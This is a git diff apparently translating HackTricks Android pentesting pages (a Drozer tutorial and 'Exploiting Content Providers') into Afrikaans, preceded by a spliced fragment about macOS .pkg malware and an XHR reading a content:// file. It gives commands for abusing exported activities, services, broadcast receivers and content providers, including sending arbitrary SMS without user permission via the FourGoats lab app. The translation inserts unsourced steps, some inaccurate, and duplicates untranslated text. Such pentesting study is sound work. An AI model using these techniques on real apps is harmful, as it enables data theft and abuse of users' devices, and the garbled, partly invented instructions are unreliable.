talk: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE) +## pkg as kwaadwillige sagteware -## pkg as malware +### Leë Nutslading -### Empty Payload - -It's possible to just generate a **`.pkg`** file with **pre and post-install scripts** without any payload. +Dit is moontlik om net 'n **`.pkg`** lêer te genereer met **voor- en na-installasie skripsies** sonder enige nutslading. ### JS in Distribution xml -It's possible to add **` +xhr.open("GET", "content://media/external/file/747"); +xhr.send(); +} + ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md b/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md index 223be8c86..d44c783fd 100644 --- a/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md +++ b/mobile-pentesting/android-app-pentesting/drozer-tutorial/README.md @@ -1,95 +1,84 @@ -# Drozer Tutorial +# Drozer Tutoriaal
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## APKs to test +## APK's om te toets -* [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (from mrwlabs) +* [Sieve](https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk) (van mrwlabs) * [DIVA](https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz) -**Parts of this tutorial were extracted from the [Drozer documentation pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf).** +**Dele van hierdie tutoriaal is onttrek uit die [Drozer-dokumentasie pdf](https://labs.withsecure.com/content/dam/labs/docs/mwri-drozer-user-guide-2015-03-23.pdf).** -## Installation - -Install Drozer Client inside your host. Download it from the [latest releases](https://github.com/mwrlabs/drozer/releases). +## Installasie +Installeer Drozer Client binne jou gasheer. Laai dit af van die [nuutste vrystellings](https://github.com/mwrlabs/drozer/releases). ```bash pip install drozer-2.4.4-py2-none-any.whl pip install twisted pip install service_identity ``` - -Download and install drozer APK from the [latest releases](https://github.com/mwrlabs/drozer/releases). At this moment it is [this](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk). - +Laai die drozer APK af en installeer dit vanaf die [nuutste vrystellings](https://github.com/mwrlabs/drozer/releases). Op hierdie oomblik is dit [hierdie](https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk). ```bash adb install drozer.apk ``` +### Begin die Bediener -### Starting the Server - -Agent is running on port 31415, we need to [port forward](https://en.wikipedia.org/wiki/Port\_forwarding) to establish the communication between the Drozer Client and Agent, here is the command to do so: - +Agent loop op poort 31415, ons moet [poort deurstuur](https://af.wikipedia.org/wiki/Poort_deurstuur) om die kommunikasie tussen die Drozer-kliënt en Agent te vestig, hier is die opdrag om dit te doen: ```bash adb forward tcp:31415 tcp:31415 ``` - -Finally, **launch** the **application** and press the bottom "**ON**" +Uiteindelik, **begin** die **toepassing** en druk die "**ON**" knoppie ![](<../../../.gitbook/assets/image (63).png>) -And connect to it: - +En maak daarmee verbinding: ```bash drozer console connect ``` +## Interessante Opdragte -## Interesting Commands - -| **Commands** | **Description** | +| **Opdragte** | **Beskrywing** | | --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------ | -| **Help MODULE** | Shows help of the selected module | -| **list** | Shows a list of all drozer modules that can be executed in the current session. This hides modules that you don’t have appropriate permissions to run. | -| **shell** | Start an interactive Linux shell on the device, in the context of the Agent. | -| **clean** | Remove temporary files stored by drozer on the Android device. | -| **load** | Load a file containing drozer commands and execute them in sequence. | -| **module** | Find and install additional drozer modules from the Internet. | -| **unset** | Remove a named variable that drozer passes to any Linux shells that it spawns. | -| **set** | Stores a value in a variable that will be passed as an environmental variable to any Linux shells spawned by drozer. | -| **shell** | Start an interactive Linux shell on the device, in the context of the Agent | -| **run MODULE** | Execute a drozer module | -| **exploit** | Drozer can create exploits to execute in the decide. `drozer exploit list` | -| **payload** | The exploits need a payload. `drozer payload list` | +| **Help MODULE** | Toon die hulp van die gekose module | +| **lys** | Toon 'n lys van alle drozer modules wat in die huidige sessie uitgevoer kan word. Hierdie verberg modules waarvoor jy nie die nodige toestemmings het om uit te voer nie. | +| **shell** | Begin 'n interaktiewe Linux-skulp op die toestel, in die konteks van die Agent. | +| **skoon** | Verwyder tydelike lêers wat deur drozer op die Android-toestel gestoor word. | +| **laai** | Laai 'n lêer wat drozer-opdragte bevat en voer hulle in volgorde uit. | +| **module** | Vind en installeer addisionele drozer-modules van die internet. | +| **unset** | Verwyder 'n benoemde veranderlike wat drozer aan enige Linux-skulpe wat dit skep, oordra. | +| **stel** | Stoor 'n waarde in 'n veranderlike wat as 'n omgewingsveranderlike aan enige Linux-skulpe wat deur drozer geskep word, oorgedra sal word. | +| **shell** | Begin 'n interaktiewe Linux-skulp op die toestel, in die konteks van die Agent | +| **run MODULE** | Voer 'n drozer-module uit | +| **exploit** | Drozer kan exploits skep om in die toestel uit te voer. `drozer exploit list` | +| **payload** | Die exploits benodig 'n payload. `drozer payload list` | -### Package - -Find the **name** of the package filtering by part of the name: +### Pakket +Vind die **naam** van die pakket deur te filtreer op 'n deel van die naam: ```bash -dz> run app.package.list -f sieve +dz> run app.package.list -f sieve com.mwr.example.sieve ``` - -**Basic Information** of the package: - +**Basiese Inligting** van die pakkie: ```bash dz> run app.package.info -a com.mwr.example.sieve Package: com.mwr.example.sieve @@ -102,59 +91,67 @@ GID: [1028, 1015, 3003] Shared Libraries: null Shared User ID: null Uses Permissions: - - android.permission.READ_EXTERNAL_STORAGE - - android.permission.WRITE_EXTERNAL_STORAGE - - android.permission.INTERNET +- android.permission.READ_EXTERNAL_STORAGE +- android.permission.WRITE_EXTERNAL_STORAGE +- android.permission.INTERNET Defines Permissions: - - com.mwr.example.sieve.READ_KEYS - - com.mwr.example.sieve.WRITE_KEYS +- com.mwr.example.sieve.READ_KEYS +- com.mwr.example.sieve.WRITE_KEYS ``` - -Read **Manifest**: - +Lees **Manifest**: ```bash run app.package.manifest jakhar.aseem.diva ``` - -**Attack surface** of the package: - +**Aanvalsvlak** van die pakket: ```bash dz> run app.package.attacksurface com.mwr.example.sieve Attack Surface: - 3 activities exported - 0 broadcast receivers exported - 2 content providers exported - 2 services exported - is debuggable +3 activities exported +0 broadcast receivers exported +2 content providers exported +2 services exported +is debuggable ``` +* **Aktiwiteite**: Miskien kan jy 'n aktiwiteit begin en 'n sekere soort outorisasie om dit te begin, omseil wat jou behoort te verhoed om dit te begin. +* **Inhoudsverskaffers**: Miskien kan jy toegang verkry tot private data of 'n sekere kwesbaarheid uitbuit (SQL-injeksie of Padtraversal). +* **Dienste**: +* **is debuggable**: [Leer meer](./#is-debuggeable) -* **Activities**: Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. -* **Content providers**: Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal). -* **Services**: -* **is debuggable**: [Learn more](./#is-debuggeable) - -### Activities - -An exported activity component’s “android:exported” value is set to **“true”** in the AndroidManifest.xml file: +### Aktiwiteite +Die "android:exported" waarde van 'n uitgevoerde aktiwiteitskomponent is ingestel op **"true"** in die AndroidManifest.xml-lêer: ```markup ``` +**Lys uitgevoerde aktiwiteite**: -**List exported activities**: +Om die uitgevoerde aktiwiteite in 'n lysformaat te sien, kan jy die volgende stappe volg: +1. Installeer die drozer-agentskakel op die teiken Android-toestel. +2. Maak 'n verbinding met die drozer-agentskakel deur die opdraglyn te gebruik. +3. Voer die volgende opdrag in: `run app.package.list -f`. +4. Die lys van uitgevoerde aktiwiteite sal vertoon word, insluitend die pakketname en aktiwiteitsname. + +Hier is 'n voorbeeld van hoe die uitvoer van die opdrag sal lyk: + +``` +com.example.app/.MainActivity +com.example.app/.LoginActivity +com.example.app/.SettingsActivity +``` + +Hierdie lys toon die pakketname en aktiwiteitsname van die uitgevoerde aktiwiteite in die toepassing. ```bash dz> run app.activity.info -a com.mwr.example.sieve Package: com.mwr.example.sieve - com.mwr.example.sieve.FileSelectActivity - com.mwr.example.sieve.MainLoginActivity - com.mwr.example.sieve.PWList +com.mwr.example.sieve.FileSelectActivity +com.mwr.example.sieve.MainLoginActivity +com.mwr.example.sieve.PWList ``` +**Begin aktiwiteit**: -**Start activity**: - -Maybe you can start an activity and bypass some kind of authorization that should be prevent you from launching it. +Miskien kan jy 'n aktiwiteit begin en 'n soort van outorisering omseil wat jou moet verhoed om dit te begin. {% code overflow="wrap" %} ```bash @@ -162,22 +159,20 @@ dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sie ``` {% endcode %} -You can also start an exported activity from **adb**: - -* PackageName is com.example.demo -* Exported ActivityName is com.example.test.MainActivity +Jy kan ook 'n uitgevoerde aktiwiteit vanaf **adb** begin: +* Pakketnaam is com.example.demo +* Uitgevoerde aktiwiteitnaam is com.example.test.MainActivity ```bash adb shell am start -n com.example.demo/com.example.test.MainActivity ``` +### Inhoudbieders -### Content Providers +Hierdie pos was te groot om hier te wees, so **jy kan** [**daarop toegang kry op sy eie bladsy hier**](exploiting-content-providers.md). -This post was so big to be here so **you can** [**access it in its own page here**](exploiting-content-providers.md). +### Dienste -### Services - -A exported service is declared inside the Manifest.xml: +'n Uitgevoerde diens word binne die Manifest.xml verklaar: {% code overflow="wrap" %} ```markup @@ -185,152 +180,160 @@ A exported service is declared inside the Manifest.xml: ``` {% endcode %} -Inside the code **check** for the \*\*`handleMessage`\*\*function which will **receive** the **message**: +Binne die kode **kyk** vir die \*\*`handleMessage`\*\*funksie wat die **boodskap** sal **ontvang**: ![](<../../../.gitbook/assets/image (194).png>) -#### List service - +#### Lysdiens ```bash -dz> run app.service.info -a com.mwr.example.sieve +dz> run app.service.info -a com.mwr.example.sieve Package: com.mwr.example.sieve - com.mwr.example.sieve.AuthService - Permission: null - com.mwr.example.sieve.CryptoService - Permission: null +com.mwr.example.sieve.AuthService +Permission: null +com.mwr.example.sieve.CryptoService +Permission: null ``` +#### **Interaksie** met 'n diens -#### **Interact** with a service +To interact with a service, you need to use the `run` command in drozer. This command allows you to execute various modules and actions against the target application. +Om met 'n diens te interaksieer, moet jy die `run`-opdrag in drozer gebruik. Hierdie opdrag stel jou in staat om verskeie modules en aksies teen die teikentoepassing uit te voer. ```bash -app.service.send Send a Message to a service, and display the reply -app.service.start Start Service +app.service.send Send a Message to a service, and display the reply +app.service.start Start Service app.service.stop Stop Service ``` +#### Voorbeeld -#### Example - -Take a look to the **drozer** help for `app.service.send`: +Neem 'n kykie na die **drozer** hulp vir `app.service.send`: ![](<../../../.gitbook/assets/image (196) (1).png>) -Note that you will be sending first the data inside "_msg.what_", then "_msg.arg1_" and "_msg.arg2_", you should check inside the code **which information is being used** and where.\ -Using the `--extra` option you can send something interpreted by "_msg.replyTo"_, and using `--bundle-as-obj` you create and object with the provided details. +Let daarop dat jy eers die data binne "_msg.what_", dan "_msg.arg1_" en "_msg.arg2_" sal stuur. Jy moet binne die kode **ondersoek watter inligting gebruik word** en waar.\ +Met behulp van die `--extra` opsie kan jy iets stuur wat geïnterpreteer word deur "_msg.replyTo"_, en deur `--bundle-as-obj` te gebruik, skep jy 'n objek met die verskafte besonderhede. -In the following example: +In die volgende voorbeeld: * `what == 2354` * `arg1 == 9234` * `arg2 == 1` * `replyTo == object(string com.mwr.example.sieve.PIN 1337)` - ```bash run app.service.send com.mwr.example.sieve com.mwr.example.sieve.AuthService --msg 2354 9234 1 --extra string com.mwr.example.sieve.PIN 1337 --bundle-as-obj ``` - ![](<../../../.gitbook/assets/image (195).png>) -### Broadcast Receivers +### Uitsaai-Ontvangers -**In the Android basic info section you can see what is a Broadcast Receiver**. +**In die Android basiese inligting afdeling kan jy sien wat 'n Uitsaai-Ontvanger is**. -After discovering this Broadcast Receivers you should **check the code** of them. Pay special attention to the **`onReceive`** function as it will be handling the messages received. - -#### **Detect all** broadcast receivers +Nadat jy hierdie Uitsaai-Ontvangers ontdek het, moet jy **die kode nagaan**. Gee spesiale aandag aan die **`onReceive`** funksie, aangesien dit die ontvangste boodskappe sal hanteer. +#### **Ontdek alle** uitsaai-ontvangers ```bash run app.broadcast.info #Detects all ``` +#### Kontroleer uitsaai-ontvangers van 'n app -#### Check broadcast receivers of an app +Om die uitsaai-ontvangers van 'n Android-app te kontroleer, kan jy die volgende stappe volg: +1. Installeer en begin drozer op jou toestel. +2. Verbind met die toestel deur die `connect`-bevel te gebruik. +3. Voer die volgende bevel in om 'n lys van alle geïnstalleerde pakkette op die toestel te kry: + + ``` + run app.package.list -f + ``` + +4. Identifiseer die pakketnaam van die app wat jy wil ondersoek. +5. Voer die volgende bevel in om 'n lys van alle uitsaai-ontvangers van die app te kry: + + ``` + run app.broadcast.info -a + ``` + + Vervang `` met die werklike pakketnaam van die app. + +6. Jy sal 'n lys van uitsaai-ontvangers sien wat deur die app gebruik word, tesame met hul besonderhede soos die ontvangerklas en die uitsaai-intentfilters. + +Deur hierdie stappe te volg, kan jy die uitsaai-ontvangers van 'n Android-app ondersoek en relevante inligting verkry. ```bash #Check one negative run app.broadcast.info -a jakhar.aseem.diva Package: jakhar.aseem.diva - No matching receivers. +No matching receivers. # Check one positive run app.broadcast.info -a com.google.android.youtube Package: com.google.android.youtube - com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver - Permission: null - com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver - Permission: com.google.android.c2dm.permission.SEND - com.google.android.apps.youtube.app.PackageReplacedReceiver - Permission: null - com.google.android.libraries.youtube.account.AccountsChangedReceiver - Permission: null - com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver - Permission: null +com.google.android.libraries.youtube.player.PlayerUiModule$LegacyMediaButtonIntentReceiver +Permission: null +com.google.android.apps.youtube.app.common.notification.GcmBroadcastReceiver +Permission: com.google.android.c2dm.permission.SEND +com.google.android.apps.youtube.app.PackageReplacedReceiver +Permission: null +com.google.android.libraries.youtube.account.AccountsChangedReceiver +Permission: null +com.google.android.apps.youtube.app.application.system.LocaleUpdatedReceiver +Permission: null ``` - -#### Broadcast **Interactions** - +#### Uitsaai **Interaksies** ```bash -app.broadcast.info Get information about broadcast receivers -app.broadcast.send Send broadcast using an intent +app.broadcast.info Get information about broadcast receivers +app.broadcast.send Send broadcast using an intent app.broadcast.sniff Register a broadcast receiver that can sniff particular intents ``` +#### Stuur 'n boodskap -#### Send a message - -In this example abusing the [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Content Provider you can **send an arbitrary SMS** any non-premium destination **without asking** the user for permission. +In hierdie voorbeeld misbruik die [FourGoats apk](https://github.com/linkedin/qark/blob/master/tests/goatdroid.apk) Inhoudsverskaffer kan jy **'n willekeurige SMS stuur** na enige nie-premium bestemming **sonder om** die gebruiker om toestemming te vra. ![](<../../../.gitbook/assets/image (199).png>) ![](<../../../.gitbook/assets/image (197) (1).png>) -If you read the code, the parameters "_phoneNumber_" and "_message_" must be sent to the Content Provider. - +As jy die kode lees, moet die parameters "_phoneNumber_" en "_message_" na die Inhoudsverskaffer gestuur word. ```bash run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats.broadcastreceivers SendSMSNowReceiver --extra string phoneNumber 123456789 --extra string message "Hello mate!" ``` +### Is debugeerbaar -### Is debuggeable - -A prodduction APK should never be debuggeable.\ -This mean that you can **attach java debugger** to the running application, inspect it in run time, set breakpoints, go step by step, gather variable values and even change them.[ InfoSec institute has an excellent article](../exploiting-a-debuggeable-applciation.md) on digging deeper when you application is debuggable and injecting runtime code. - -When an application is debuggable, it will appear in the Manifest: +'n Produksie APK moet nooit debugeerbaar wees nie. Dit beteken dat jy 'n Java debugeerder kan koppel aan die lopende toepassing, dit in uitvoertyd kan ondersoek, breekpunte kan stel, stap vir stap kan gaan, veranderlike waardes kan versamel en selfs kan verander. [InfoSec-instituut het 'n uitstekende artikel](../exploiting-a-debuggeable-application.md) oor dieper graafwerk wanneer jou toepassing debugeerbaar is en in uitvoertyd kode inspuit. +Wanneer 'n toepassing debugeerbaar is, sal dit in die manifest verskyn: ```xml -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin om belonings te verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md index 30de62327..ae4762be3 100644 --- a/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md +++ b/mobile-pentesting/android-app-pentesting/drozer-tutorial/exploiting-content-providers.md @@ -1,102 +1,95 @@ -# Exploiting Content Providers +# Uitbuiting van Inhoudsverskaffers -## Exploiting Content Providers +## Uitbuiting van Inhoudsverskaffers
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
-## Intro +## Inleiding -Data is **supplied from one application to others** on request by a component known as a **content provider**. These requests are managed through the **ContentResolver class** methods. Content providers can store their data in various locations, such as a **database**, **files**, or over a **network**. - -In the _Manifest.xml_ file, the declaration of the content provider is required. For instance: +Data word **verskaf van die een toepassing na die ander** op versoek deur 'n komponent wat bekend staan as 'n **inhoudsverskaffer**. Hierdie versoek word hanteer deur die metodes van die **ContentResolver-klas**. Inhoudsverskaffers kan hul data in verskillende plekke stoor, soos 'n **databasis**, **lêers**, of oor 'n **netwerk**. +In die _Manifest.xml_ lêer is die verklaring van die inhoudsverskaffer vereis. Byvoorbeeld: ```xml - + ``` +Om toegang te verkry tot `content://com.mwr.example.sieve.DBContentProvider/Keys`, is die `READ_KEYS` toestemming nodig. Dit is interessant om op te merk dat die pad `/Keys/` toeganklik is in die volgende afdeling, wat nie beskerm is as gevolg van 'n fout deur die ontwikkelaar nie, wat `/Keys` beveilig het, maar `/Keys/` verklaar het. -To access `content://com.mwr.example.sieve.DBContentProvider/Keys`, the `READ_KEYS` permission is necessary. It's interesting to note that the path `/Keys/` is accessible in the following section, which is not protected due to a mistake by the developer, who secured `/Keys` but declared `/Keys/`. - -**Maybe you can access private data or exploit some vulnerability (SQL Injection or Path Traversal).** - -## Get info from **exposed content providers** +**Miskien kan jy privaat data verkry of 'n kwesbaarheid uitbuit (SQL-injeksie of padtraversal).** +## Kry inligting van **blootgestelde inhoudverskaffers** ``` -dz> run app.provider.info -a com.mwr.example.sieve - Package: com.mwr.example.sieve - Authority: com.mwr.example.sieve.DBContentProvider - Read Permission: null - Write Permission: null - Content Provider: com.mwr.example.sieve.DBContentProvider - Multiprocess Allowed: True - Grant Uri Permissions: False - Path Permissions: - Path: /Keys - Type: PATTERN_LITERAL - Read Permission: com.mwr.example.sieve.READ_KEYS - Write Permission: com.mwr.example.sieve.WRITE_KEYS - Authority: com.mwr.example.sieve.FileBackupProvider - Read Permission: null - Write Permission: null - Content Provider: com.mwr.example.sieve.FileBackupProvider - Multiprocess Allowed: True - Grant Uri Permissions: False +dz> run app.provider.info -a com.mwr.example.sieve +Package: com.mwr.example.sieve +Authority: com.mwr.example.sieve.DBContentProvider +Read Permission: null +Write Permission: null +Content Provider: com.mwr.example.sieve.DBContentProvider +Multiprocess Allowed: True +Grant Uri Permissions: False +Path Permissions: +Path: /Keys +Type: PATTERN_LITERAL +Read Permission: com.mwr.example.sieve.READ_KEYS +Write Permission: com.mwr.example.sieve.WRITE_KEYS +Authority: com.mwr.example.sieve.FileBackupProvider +Read Permission: null +Write Permission: null +Content Provider: com.mwr.example.sieve.FileBackupProvider +Multiprocess Allowed: True +Grant Uri Permissions: False ``` +Dit is moontlik om te bepaal hoe om die **DBContentProvider** te bereik deur URIs te begin met "_content://_". Hierdie benadering is gebaseer op insigte wat verkry is deur Drozer te gebruik, waar sleutelinligting in die _/Keys_ gids gevind is. -It's possible to piece together how to reach the **DBContentProvider** by starting URIs with “_content://_”. This approach is based on insights gained from using Drozer, where key information was located in the _/Keys_ directory. - -Drozer can **guess and try several URIs**: - +Drozer kan **veral URIs raai en probeer**: ``` -dz> run scanner.provider.finduris -a com.mwr.example.sieve +dz> run scanner.provider.finduris -a com.mwr.example.sieve Scanning com.mwr.example.sieve... Unable to Query content://com.mwr.example.sieve.DBContentProvider/ -... -Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys +... +Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys Accessible content URIs: content://com.mwr.example.sieve.DBContentProvider/Keys/ content://com.mwr.example.sieve.DBContentProvider/Passwords content://com.mwr.example.sieve.DBContentProvider/Passwords/ ``` - -You should also check the **ContentProvider code** to search for queries: +Jy moet ook die **ContentProvider-kode** nagaan om na navrae te soek: ![](<../../../.gitbook/assets/image (121) (1) (1) (1).png>) -Also, if you can't find full queries you could **check which names are declared by the ContentProvider** on the `onCreate` method: +As jy nie volledige navrae kan vind nie, kan jy **nagaan watter name deur die ContentProvider verklaar word** in die `onCreate`-metode: ![](<../../../.gitbook/assets/image (186).png>) -The query will be like: `content://name.of.package.class/declared_name` +Die navraag sal wees: `content://name.of.package.class/declared_name` -## **Database-backed Content Providers** +## **Databasis-ondersteunde Content Providers** -Probably most of the Content Providers are used as **interface** for a **database**. Therefore, if you can access it you could be able to **extract, update, insert and delete** information.\ -Check if you can **access sensitive information** or try to change it to **bypass authorisation** mechanisms. +Waarskynlik word die meeste Content Providers gebruik as **koppelvlak** vir 'n **databasis**. Daarom, as jy toegang daartoe kan verkry, kan jy inligting **onttrek, opdateer, invoeg en verwyder**.\ +Kyk of jy **gevoelige inligting kan ontsluit** of probeer dit verander om **outoriseringsmeganismes te omseil**. -When checking the code of the Content Provider **look** also for **functions** named like: _query, insert, update and delete_: +Wanneer jy die kode van die Content Provider nagaan, soek ook na **funksies** met name soos: _query, insert, update en delete_: ![](<../../../.gitbook/assets/image (187).png>) ![](<../../../.gitbook/assets/image (254) (1) (1) (1) (1) (1) (1) (1).png>) -Because you will be 